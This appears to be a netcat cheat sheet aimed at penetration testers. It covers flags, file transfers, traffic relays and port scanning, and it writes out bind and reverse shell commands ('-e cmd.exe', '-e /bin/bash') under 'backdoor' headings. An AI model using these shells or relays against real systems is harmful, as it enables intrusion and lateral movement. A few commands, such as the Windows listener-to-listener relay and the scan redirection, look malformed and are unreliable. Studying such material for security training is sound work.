Netcat is a tool that can read and write TCP and UDP ports. This tool may not strike you as impressive but its simple and effective nature has made it so ubiquitous that it has been known as the Hacker’s Swiss Army Knife. It is regularly used to connect to a target service, port scan, transfer files, or even port forward for tunneling. Using deliberate netcat connections can enumerate a target much like nmap. Learn and practice this tool if you plan on being capable in this domain.
Basics
Netcat Client: nc [TargetIPaddress] [TargetPort] #Connect to target IP address on the specified port
Example: nc 10.0.0.10 25.
Netcat Listener: nc -lp [LocalPort] #Establish a listener on an arbitrary local port
Example: nc -lp 7777
Flags
- -l – Listen mode
- -L – Persistent listener will continue listening after connection severs (windows only)
- -p – Local port
- -n – Prevent DNS lookup
- -v – Verbose mode (also -vv for more verbose)
- -e – Execute program upon connection
- -u – UDP mode
- -z – Zero-I/O mode will not receive any data from server (useful in port scanning)
- -wN – Netcat only runs for N seconds
File Transfers
Client to Listener (push)
Listener: nc -lp [LocalPort] < [file]
Client: nc [TargetIPaddress] [TargetPort] > [file]
Example:
Listener: nc -lp 7777 > evil.exe
Client: nc 10.0.0.14 7777 < evil.exe
Listener to Client (pull)
Listener: nc -lp [LocalPort] > [file]
Client: nc [TargetIPaddress] [TargetPort] < [file]
Example:
Listener: nc -lp 7777 < evil.exe
Client: nc 10.0.0.14 7777 > evil.exe
Shells
Listening backdoor
Listener: nc -lp [LocalPort] -e cmd.exe
Client: nc [TargetIPaddress] [TargetPort]
Example:
Listener: nc -lp 7777 -e cmd.exe
Client: nc 10.0.0.14 7777
Reverse backdoor
Listener: nc -lp [LocalPort]
Client: nc [TargetIPaddress] [TargetPort] -e /bin/bash
Example:
Listener: nc -lp 7777
Client: nc 10.0.0.14 7777 -e /bin/bash
**/bin/bash provides the shell access for linux systems while cmd.exe is for windows systems
Relays
Linux – Listener to Client:
Relay: cd /tmp
Relay: mknod backpipe p
Relay: nc -lp [LocalPort] 0< backpipe | nc [TargetIPAddress] [TargetPort] | tee backpipe
Connecter:nc [TargetIPAddress] [TargetPort]
Example:
Relay(10.0.0.14): nc -lp 23 0< backpipe | nc 10.0.0.55 23 | tee backpipe
Connector: nc 10.0.0.14 23
**This will forward all traffic the connector sends to the relay (10.0.0.14) on port 23 to the target (10.0.0.55)
on it’s port 23
Linux – Listener to Listener:
Relay: cd /tmp
Relay: mknod backpipe p
Relay: nc -lp [LocalPort-1] 0< backpipe | nc -lp [LocalPort-2] | tee backpipe
Connecter1:nc [TargetIPAddress] [TargetPort-1]
Connecter2:nc [TargetIPAddress] [TargetPort-2]
Example:
Relay(10.0.0.14): nc -lp 7777 0< backpipe | nc -lp 7779 | tee backpipe
Connector1: nc 10.0.0.14 7777
Connector2: nc 10.0.0.14 7779
**This will forward all traffic between the connectors through the relay(10.0.0.14)
Windows – Listener to Client:
Relay: cd c:\temp
Relay: echo nc [TargetIPaddress] [TargetPort] > forward.bat
Relay: nc -lp [LocalPort] -e forward.bat
Connecter:nc [TargetIPAddress] [TargetPort]
Example:
Relay(10.0.0.14): echo nc 10.0.0.55 23 > forward.bat
Relay(10.0.0.14): nc -lp 23 -e forward.bat
Connector: nc 10.0.0.14 23
**This will forward all traffic the connector sends to the relay (10.0.0.14) on port 23 to the target (10.0.0.55)
on it’s port 23
Windows – Listener to Listener:
Relay: cd c:\temp
Relay: echo nc [LocalPort-2] > forward.bat
Relay: nc -lp [LocalPort-1] -e forward.bat
Connecter:nc [TargetIPAddress] [TargetPort]
Example:
Relay(10.0.0.14): echo nc 7779 > forward.bat
Relay(10.0.0.14): nc -lp 7777 -e forward.bat
Connector12: nc 10.0.0.14 7777
Connector: nc 10.0.0.14 7779
**This will forward all traffic between the connectors through the relay(10.0.0.14)
Port Scanning
Host: nc -nvzw1 [TargetIPAddress] [StartPort]-[EndPort] 2> > (grep -v refused)
Example:
Host:nc -nvzw1 10.0.0.14 1-1023 2> > (grep -v refused)
